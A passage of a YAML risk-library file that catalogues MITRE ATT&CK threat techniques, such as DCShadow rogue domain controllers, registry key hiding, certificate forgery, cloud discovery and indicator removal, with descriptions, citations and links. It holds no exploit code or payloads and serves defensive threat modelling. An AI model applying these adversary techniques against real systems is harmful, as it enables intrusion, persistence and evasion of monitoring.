urn:intuitem:risk:threat:mitre-attack:T1596 + name: T1596 - Search Open Technical Databases + provider: MITRE ATT&CK + description: 'Adversaries may search freely available technical databases for + information about victims that can be used during targeting. Information about + victims may be available in online databases and repositories, such as registrations + of domains/certificates as well as public collections of network data/artifacts + gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: + Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: + DigitalShadows CDN)(Citation: Shodan) + + + Adversaries may search in different open databases depending on what information + they seek to gather. Information from these sources may reveal opportunities + for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) + or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), + establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) + or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), + and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) + or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). + + https://attack.mitre.org/techniques/T1596' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1207 + name: T1207 - Rogue Domain Controller + provider: MITRE ATT&CK + description: 'Adversaries may register a rogue Domain Controller to enable manipulation + of Active Directory data. DCShadow may be used to create a rogue Domain Controller + (DC). DCShadow is a method of manipulating Active Directory (AD) data, including + objects and schemas, by registering (or reusing an inactive registration) and + simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, + a rogue DC may be able to inject and replicate changes into AD infrastructure + for any domain object, including credentials and keys. + + + Registering a rogue DC involves creating a new server and nTDSDSA objects in + the Configuration partition of the AD schema, which requires Administrator privileges + (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity + Mimikatz Guide) + + + This technique may bypass system logging and security monitors such as security + information and event management (SIEM) products (since actions taken on a rogue + DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique + may also be used to alter and delete replication and other associated metadata + to obstruct forensic analysis. Adversaries may also utilize this technique to + perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) + and/or manipulate AD objects (such as accounts, access control lists, schemas) + to establish backdoors for Persistence. (Citation: DCShadow Blog) + + https://attack.mitre.org/techniques/T1207' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1610 + name: T1610 - Deploy Container + provider: MITRE ATT&CK + description: 'Adversaries may deploy a container into an environment to facilitate + execution or evade defenses. In some cases, adversaries may deploy a new container + to execute processes associated with a particular image or deployment, such + as processes that execute or download malware. In others, an adversary may deploy + a new container configured without network rules, user limitations, etc. to + bypass existing defenses within the environment. + + + Containers can be deployed by various means, such as via Docker''s create + and start APIs or via a web application such as the Kubernetes + dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes + Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based + on retrieved or built malicious images or from benign images that download and + execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts) + + https://attack.mitre.org/techniques/T1610' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1112 + name: T1112 - Modify Registry + provider: MITRE ATT&CK + description: 'Adversaries may interact with the Windows Registry to hide configuration + information within Registry keys, remove information as part of cleaning up, + or as part of other techniques to aid in persistence and execution. + + + Access to specific areas of the Registry depends on account permissions, some + requiring administrator-level access. The built-in Windows command-line utility + [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote + Registry modification. (Citation: Microsoft Reg) Other tools may also be used, + such as a remote access tool, which may contain functionality to interact with + the Registry through the Windows API. + + + Registry modifications may also include actions to hide keys, such as prepending + key names with a null character, which will cause an error and/or be ignored + when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities + using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may + abuse these pseudo-hidden keys to conceal payloads/commands used to maintain + persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps + Hiding Reg Jul 2017) + + + The Registry of a remote system may be modified to aid in execution of files + as part of lateral movement. It requires the remote Registry service to be running + on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) + are required, along with access to the remote system''s [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) + for RPC communication. + + https://attack.mitre.org/techniques/T1112' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1580 + name: T1580 - Cloud Infrastructure Discovery + provider: MITRE ATT&CK + description: "An adversary may attempt to discover infrastructure and resources\ + \ that are available within an infrastructure-as-a-service (IaaS) environment.\ + \ This includes compute service resources such as instances, virtual machines,\ + \ and snapshots as well as resources of other services including the storage\ + \ and database services.\n\nCloud providers offer methods such as APIs and commands\ + \ issued through CLIs to serve information about infrastructure. For example,\ + \ AWS provides a DescribeInstances API within the Amazon EC2 API\ + \ that can return information about one or more instances within an account,\ + \ the ListBuckets API that returns a list of all buckets owned\ + \ by the authenticated sender of the request, the HeadBucket API\ + \ to determine a bucket\u2019s existence along with access permissions of the\ + \ request sender, or the GetPublicAccessBlock API to retrieve access\ + \ block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation:\ + \ Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation:\ + \ AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud\ + \ compute instances list command to list all Google Compute Engine instances\ + \ in a project (Citation: Google Compute Instances), and Azure's CLI command\ + \ az vm list lists details of virtual machines.(Citation: Microsoft\ + \ AZ CLI) In addition to API commands, adversaries can utilize open source tools\ + \ to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation:\ + \ Malwarebytes OSINT Leaky Buckets - Hioureas)\n\nAn adversary may enumerate\ + \ resources using a compromised user's access keys to determine which are available\ + \ to that user.(Citation: Expel IO Evil in AWS) The discovery of these available\ + \ resources may help adversaries determine their next steps in the Cloud environment,\ + \ such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary\ + \ may also use this information to change the configuration to make the bucket\ + \ publicly accessible, allowing data to be accessed without authentication.\ + \ Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances\ + \ to determine size, owner, permissions, and network ACLs of database resources.\ + \ (Citation: AWS Describe DB Instances) Adversaries can use this information\ + \ to determine the potential value of databases and discover the requirements\ + \ to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526),\ + \ this technique focuses on the discovery of components of the provided services\ + \ rather than the services themselves.\nhttps://attack.mitre.org/techniques/T1580" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1491 + name: T1491 - Defacement + provider: MITRE ATT&CK + description: 'Adversaries may modify visual content available internally or externally + to an enterprise network, thus affecting the integrity of the original content. + Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include + delivering messaging, intimidation, or claiming (possibly false) credit for + an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) + in order to cause user discomfort, or to pressure compliance with accompanying + messages. + + https://attack.mitre.org/techniques/T1491' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1535 + name: T1535 - Unused/Unsupported Cloud Regions + provider: MITRE ATT&CK + description: 'Adversaries may create cloud instances in unused geographic service + regions in order to evade detection. Access is usually obtained through compromising + accounts used to manage cloud infrastructure. + + + Cloud service providers often provide infrastructure throughout the world in + order to improve performance, provide redundancy, and allow customers to meet + compliance requirements. Oftentimes, a customer will only use a subset of the + available regions and may not actively monitor other regions. If an adversary + creates resources in an unused region, they may be able to operate undetected. + + + A variation on this behavior takes advantage of differences in functionality + across cloud regions. An adversary could utilize regions which do not support + advanced detection services in order to avoid detection of their activity. + + + An example of adversary use of unused AWS regions is to mine cryptocurrency + through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which + can cost organizations substantial amounts of money over time depending on the + processing power used.(Citation: CloudSploit - Unused AWS Regions) + + https://attack.mitre.org/techniques/T1535' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1563 + name: T1563 - Remote Service Session Hijacking + provider: MITRE ATT&CK + description: 'Adversaries may take control of preexisting sessions with remote + services to move laterally in an environment. Users may use valid credentials + to log into a service specifically designed to accept remote connections, such + as telnet, SSH, and RDP. When a user logs into a service, a session will be + established that will allow them to maintain a continuous interaction with that + service. + + + Adversaries may commandeer these sessions to carry out actions on remote systems. + [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) + differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) + because it hijacks an existing session rather than creating a new session using + [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking + Medium)(Citation: Breach Post-mortem SSH Hijack) + + https://attack.mitre.org/techniques/T1563' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1217 + name: T1217 - Browser Information Discovery + provider: MITRE ATT&CK + description: 'Adversaries may enumerate information about browsers to learn more + about compromised environments. Data saved by browsers (such as bookmarks, accounts, + and browsing history) may reveal a variety of personal information about users + (e.g., banking sites, relationships/interests, social media, etc.) as well as + details about internal network resources such as servers, tools/dashboards, + or other related infrastructure.(Citation: Kaspersky Autofill) + + + Browser information may also highlight additional targets after an adversary + has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) + associated with logins cached by a browser. + + + Specific storage locations vary based on platform and/or application, but browser + information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: + Chrome Roaming Profiles) + + https://attack.mitre.org/techniques/T1217' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1092 + name: T1092 - Communication Through Removable Media + provider: MITRE ATT&CK + description: 'Adversaries can perform command and control between compromised + hosts on potentially disconnected networks using removable media to transfer + commands from system to system. Both systems would need to be compromised, with + the likelihood that an Internet-connected system was compromised first and the + second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). + Commands and files would be relayed from the disconnected system to the Internet-connected + system to which the adversary has direct access. + + https://attack.mitre.org/techniques/T1092' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1222 + name: T1222 - File and Directory Permissions Modification + provider: MITRE ATT&CK + description: "Adversaries may modify file or directory permissions/attributes\ + \ to evade access control lists (ACLs) and access protected files.(Citation:\ + \ Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018)\ + \ File and directory permissions are commonly managed by ACLs configured by\ + \ the file or directory owner, or users with the appropriate permissions. File\ + \ and directory ACL implementations vary by platform, but generally explicitly\ + \ designate which users or groups can perform which actions (read, write, execute,\ + \ etc.).\n\nModifications may include changing specific access rights, which\ + \ may require taking ownership of a file or directory and/or elevated permissions\ + \ depending on the file or directory\u2019s existing permissions. This may enable\ + \ malicious activity such as modifying, replacing, or deleting specific files\ + \ or directories. Specific file and directory modifications may be a required\ + \ step for many techniques, such as establishing Persistence via [Accessibility\ + \ Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization\ + \ Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration\ + \ Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking\ + \ other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).\n\ + \nAdversaries may also change permissions of symbolic links. For example, malware\ + \ (particularly ransomware) may modify symbolic links and associated settings\ + \ to enable access to files from local shortcuts with remote paths.(Citation:\ + \ new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation:\ + \ blackmatter_blackcat)(Citation: fsutil_behavior)\nhttps://attack.mitre.org/techniques/T1222" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1595 + name: T1595 - Active Scanning + provider: MITRE ATT&CK + description: 'Adversaries may execute active reconnaissance scans to gather information + that can be used during targeting. Active scans are those where the adversary + probes victim infrastructure via network traffic, as opposed to other forms + of reconnaissance that do not involve direct interaction. + + + Adversaries may perform different forms of active scanning depending on what + information they seek to gather. These scans can also be performed in various + ways, including using native features of network protocols such as ICMP.(Citation: + Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may + reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) + or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), + establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) + or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or + initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) + or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). + + https://attack.mitre.org/techniques/T1595' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1548 + name: T1548 - Abuse Elevation Control Mechanism + provider: MITRE ATT&CK + description: 'Adversaries may circumvent mechanisms designed to control elevate + privileges to gain higher-level permissions. Most modern systems contain native + elevation control mechanisms that are intended to limit privileges that a user + can perform on a machine. Authorization has to be granted to specific users + in order to perform tasks that can be considered of higher risk. An adversary + can perform several methods to take advantage of built-in control mechanisms + in order to escalate privileges on a system. + + https://attack.mitre.org/techniques/T1548' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1125 + name: T1125 - Video Capture + provider: MITRE ATT&CK + description: 'An adversary can leverage a computer''s peripheral devices (e.g., + integrated cameras or webcams) or applications (e.g., video call services) to + capture video recordings for the purpose of gathering information. Images may + also be captured from devices or applications, potentially in specified intervals, + in lieu of video files. + + + Malware or scripts may be used to interact with the devices through an available + API provided by the operating system or an application to capture video or images. + Video or image files may be written to disk and exfiltrated later. This technique + differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due + to use of specific devices or applications for video recording rather than capturing + the victim''s screen. + + + In macOS, there are a few different malware samples that record the user''s + webcam such as FruitFly and Proton. (Citation: objective-see 2017 review) + + https://attack.mitre.org/techniques/T1125' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1016 + name: T1016 - System Network Configuration Discovery + provider: MITRE ATT&CK + description: 'Adversaries may look for details about the network configuration + and settings, such as IP and/or MAC addresses, of systems they access or through + information discovery of remote systems. Several operating system administration + utilities exist that can be used to gather this information. Examples include + [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), + [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103). + + + Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) + on network devices to gather information about configurations and settings, + such as IP addresses of configured interfaces and static/dynamic routes (e.g. + show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: + Mandiant APT41 Global Intrusion ) + + + Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) + during automated discovery to shape follow-on behaviors, including determining + certain access within the target network and what actions to do next. + + https://attack.mitre.org/techniques/T1016' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1087 + name: T1087 - Account Discovery + provider: MITRE ATT&CK + description: "Adversaries may attempt to get a listing of valid accounts, usernames,\ + \ or email addresses on a system or within a compromised environment. This information\ + \ can help adversaries determine which accounts exist, which can aid in follow-on\ + \ behavior such as brute-forcing, spear-phishing attacks, or account takeovers\ + \ (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\n\nAdversaries\ + \ may use several methods to enumerate accounts, including abuse of existing\ + \ tools, built-in commands, and potential misconfigurations that leak account\ + \ names and roles or permissions in the targeted environment.\n\nFor examples,\ + \ cloud environments typically provide easily accessible interfaces to obtain\ + \ user lists. On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001)\ + \ and other command line functionality to identify accounts. Information about\ + \ email addresses and accounts may also be extracted by searching an infected\ + \ system\u2019s files.\nhttps://attack.mitre.org/techniques/T1087" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1090 + name: T1090 - Proxy + provider: MITRE ATT&CK + description: 'Adversaries may use a connection proxy to direct network traffic + between systems or act as an intermediary for network communications to a command + and control server to avoid direct connections to their infrastructure. Many + tools exist that enable traffic redirection through proxies or port redirection, + including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. + (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies + to manage command and control communications, reduce the number of simultaneous + outbound network connections, provide resiliency in the face of connection loss, + or to ride over existing trusted communications paths between victims to avoid + suspicion. Adversaries may chain together multiple proxies to further disguise + the source of malicious traffic. + + + Adversaries can also take advantage of routing schemes in Content Delivery Networks + (CDNs) to proxy command and control traffic. + + https://attack.mitre.org/techniques/T1090' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1059 + name: T1059 - Command and Scripting Interpreter + provider: MITRE ATT&CK + description: 'Adversaries may abuse command and script interpreters to execute + commands, scripts, or binaries. These interfaces and languages provide ways + of interacting with computer systems and are a common feature across many different + platforms. Most systems come with some built-in command-line interface and scripting + capabilities, for example, macOS and Linux distributions include some flavor + of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows + installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) + and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + + + There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), + as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) + and [Visual Basic](https://attack.mitre.org/techniques/T1059/005). + + + Adversaries may abuse these technologies in various ways as a means of executing + arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) + payloads delivered to victims as lure documents or as secondary payloads downloaded + from an existing C2. Adversaries may also execute commands through interactive + terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) + in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: + Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell + Execution in Python) + + https://attack.mitre.org/techniques/T1059' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1482 + name: T1482 - Domain Trust Discovery + provider: MITRE ATT&CK + description: 'Adversaries may attempt to gather information on domain trust relationships + that may be used to identify lateral movement opportunities in Windows multi-domain/forest + environments. Domain trusts provide a mechanism for a domain to allow access + to resources based on the authentication procedures of another domain.(Citation: + Microsoft Trusts) Domain trusts allow the users of the trusted domain to access + resources in the trusting domain. The information discovered may help the adversary + conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), + [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: + AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts + can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET + methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) + is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft + Operation Wilysupply) + + https://attack.mitre.org/techniques/T1482' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1020 + name: T1020 - Automated Exfiltration + provider: MITRE ATT&CK + description: "Adversaries may exfiltrate data, such as sensitive documents, through\ + \ the use of automated processing after being gathered during Collection. \n\ + \nWhen automated exfiltration is used, other exfiltration techniques likely\ + \ apply as well to transfer the information out of the network, such as [Exfiltration\ + \ Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration\ + \ Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).\nhttps://attack.mitre.org/techniques/T1020" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1070 + name: T1070 - Indicator Removal + provider: MITRE ATT&CK + description: "Adversaries may delete or modify artifacts generated within systems\ + \ to remove evidence of their presence or hinder defenses. Various artifacts\ + \ may be created by an adversary or something that can be attributed to an adversary\u2019\ + s actions. Typically these artifacts are used as defensive indicators related\ + \ to monitored events, such as strings from downloaded files, logs that are\ + \ generated from user actions, and other data analyzed by defenders. Location,\ + \ format, and type of artifact (such as command or login history) are often\ + \ specific to each platform.\n\nRemoval of these indicators may interfere with\ + \ event collection, reporting, or other processes used to detect intrusion activity.\ + \ This may compromise the integrity of security solutions by causing notable\ + \ events to go unreported. This activity may also impede forensic analysis and\ + \ incident response, due to lack of sufficient data to determine what occurred.\n\ + https://attack.mitre.org/techniques/T1070" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1609 + name: T1609 - Container Administration Command + provider: MITRE ATT&CK + description: 'Adversaries may abuse a container administration service to execute + commands within a container. A container administration service such as the + Docker daemon, the Kubernetes API server, or the kubelet may allow remote management + of containers within an environment.(Citation: Docker Daemon CLI)(Citation: + Kubernetes API)(Citation: Kubernetes Kubelet) + + + In Docker, adversaries may specify an entrypoint during container deployment + that executes a script or command, or they may use a command such as docker + exec to execute a command within a running container.(Citation: Docker + Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient + permissions, they may gain remote execution in a container in the cluster via + interaction with the Kubernetes API server, the kubelet, or by running a command + such as kubectl exec.(Citation: Kubectl Exec Get Shell) + + https://attack.mitre.org/techniques/T1609' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1083 + name: T1083 - File and Directory Discovery + provider: MITRE ATT&CK + description: 'Adversaries may enumerate files and directories or may search in + specific locations of a host or network share for certain information within + a file system. Adversaries may use the information from [File and Directory + Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery + to shape follow-on behaviors, including whether or not the adversary fully infects + the target and/or attempts specific actions. + + + Many command shell utilities can be used to obtain this information. Examples + include dir, tree, ls, find, + and locate.(Citation: Windows Commands JPCERT) Custom tools may + also be used to gather file and directory information and interact with the + [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also + leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) + on network devices to gather file and directory information (e.g. dir, + show flash, and/or nvram).(Citation: US-CERT-TA18-106A) + + https://attack.mitre.org/techniques/T1083' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1568 + name: T1568 - Dynamic Resolution + provider: MITRE ATT&CK + description: 'Adversaries may dynamically establish connections to command and + control infrastructure to evade common detections and remediations. This may + be achieved by using malware that shares a common algorithm with the infrastructure + the adversary uses to receive the malware''s communications. These calculations + can be used to dynamically adjust parameters such as the domain name, IP address, + or port number the malware uses for command and control. + + + Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). + When contact is lost with the primary command and control server malware may + employ dynamic resolution as a means to reestablishing command and control.(Citation: + Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit + 2017 Activity) + + https://attack.mitre.org/techniques/T1568' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1647 + name: T1647 - Plist File Modification + provider: MITRE ATT&CK + description: "Adversaries may modify property list files (plist files) to enable\ + \ other malicious activity, while also potentially evading and bypassing system\ + \ defenses. macOS applications use plist files, such as the info.plist\ + \ file, to store properties and configuration settings that inform the operating\ + \ system how to handle the application at runtime. Plist files are structured\ + \ metadata in key-value pairs formatted in XML based on Apple's Core Foundation\ + \ DTD. Plist files can be saved in text or binary format.(Citation: fileinfo\ + \ plist file description) \n\nAdversaries can modify key-value pairs in plist\ + \ files to influence system behaviors, such as hiding the execution of an application\ + \ (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running\ + \ additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch\ + \ Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).\n\ + \nFor example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist`\ + \ file, which controls apps that appear in the Dock. Adversaries can also modify\ + \ the LSUIElement key in an application\u2019s info.plist\ + \ file to run the app in the background. Adversaries can also insert key-value\ + \ pairs to insert environment variables, such as LSEnvironment,\ + \ to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:\ + \ wardle chp2 persistence)(Citation: eset_osx_flashback)\nhttps://attack.mitre.org/techniques/T1647" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1074 + name: T1074 - Data Staged + provider: MITRE ATT&CK + description: 'Adversaries may stage collected data in a central location or directory + prior to Exfiltration. Data may be kept in separate files or combined into one + file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). + Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) + and bash may be used to copy data into a staging location.(Citation: PWC Cloud + Hopper April 2017) + + + In cloud environments, adversaries may stage data within a particular instance + or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) + and stage data in that instance.(Citation: Mandiant M-Trends 2020) + + + Adversaries may choose to stage data from a victim network in a centralized + location prior to Exfiltration to minimize the number of connections made to + their C2 server and better evade detection. + + https://attack.mitre.org/techniques/T1074' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1649 + name: T1649 - Steal or Forge Authentication Certificates + provider: MITRE ATT&CK + description: "Adversaries may steal or forge certificates used for authentication\ + \ to access remote systems or resources. Digital certificates are often used\ + \ to sign and encrypt messages and/or files. Certificates are also used as authentication\ + \ material. For example, Azure AD device certificates and Active Directory Certificate\ + \ Services (AD CS) certificates bind to an identity and can be used as credentials\ + \ for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft\ + \ AD CS Overview)\n\nAuthentication certificates can be both stolen and forged.\ + \ For example, AD CS certificates can be stolen from encrypted storage (in the\ + \ Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced\ + \ certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)),\ + \ or directly from the Windows certificate store via various crypto APIs.(Citation:\ + \ SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub\ + \ GhostPack Certificates) With appropriate enrollment rights, users and/or machines\ + \ within a domain can also request and/or manually renew certificates from enterprise\ + \ certificate authorities (CA). This enrollment process defines various settings\ + \ and permissions associated with the certificate. Of note, the certificate\u2019\ + s extended key usage (EKU) values define signing, encryption, and authentication\ + \ use cases, while the certificate\u2019s subject alternative name (SAN) values\ + \ define the certificate owner\u2019s alternate names.(Citation: Medium Certified\ + \ Pre Owned)\n\nAbusing certificates for authentication credentials may enable\ + \ other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008).\ + \ Certificate-related misconfigurations may also enable opportunities for [Privilege\ + \ Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users\ + \ to impersonate or assume privileged accounts or permissions via the identities\ + \ (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003)\ + \ via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078)\ + \ for the duration of the certificate's validity, despite user password resets.\ + \ Authentication certificates can also be stolen and forged for machine accounts.\n\ + \nAdversaries who have access to root (or subordinate) CA certificate private\ + \ keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003)\ + \ by forging arbitrary authentication certificates for the victim domain (known\ + \ as \u201Cgolden\u201D certificates).(Citation: Medium Certified Pre Owned)\ + \ Adversaries may also target certificates and related services in order to\ + \ access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001)\ + \ ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified\ + \ Pre Owned)\nhttps://attack.mitre.org/techniques/T1649" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1049 + name: T1049 - System Network Connections Discovery + provider: MITRE ATT&CK + description: "Adversaries may attempt to get a listing of network connections\ + \ to or from the compromised system they are currently accessing or from remote\ + \ systems by querying for information over the network. \n\nAn adversary who\ + \ gains access to a system that is part of a cloud-based environment may map\ + \ out Virtual Private Clouds or Virtual Networks in order to determine what\ + \ systems and services are connected. The actions performed are likely the same\ + \ types of discovery techniques depending on the operating system, but the resulting\ + \ information may include details about the networked cloud environment relevant\ + \ to the adversary's goals. Cloud providers may have different ways in which\ + \ their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation:\ + \ Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly,\ + \ adversaries who gain access to network devices may also perform similar discovery\ + \ activities to gather information about connected systems and services.\n\n\ + Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104),\ + \ \"net use,\" and \"net session\" with [Net](https://attack.mitre.org/software/S0039).\ + \ In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof\ + \ can be used to list current connections. who -a and w\ + \ can be used to show which users are currently logged in, similar to \"net\ + \ session\". Additionally, built-in features native to network devices and [Network\ + \ Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g.\ + \ show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A)\n\ + https://attack.mitre.org/techniques/T1049" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1584 + name: T1584 - Compromise Infrastructure + provider: MITRE ATT&CK + description: 'Adversaries may compromise third-party infrastructure that can be + used during targeting. Infrastructure solutions include physical or cloud servers, + domains, and third-party web and DNS services. Instead of buying, leasing, or + renting infrastructure an adversary may compromise infrastructure and use it + during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: + ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye + EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines + to form a botnet they can leverage. + + + Use of compromised infrastructure allows adversaries to stage, launch, and execute + operations. Compromised infrastructure can help adversary operations blend in + with traffic that is seen as normal, such as contact with high reputation or + trusted sites. For example, adversaries may leverage compromised infrastructure + 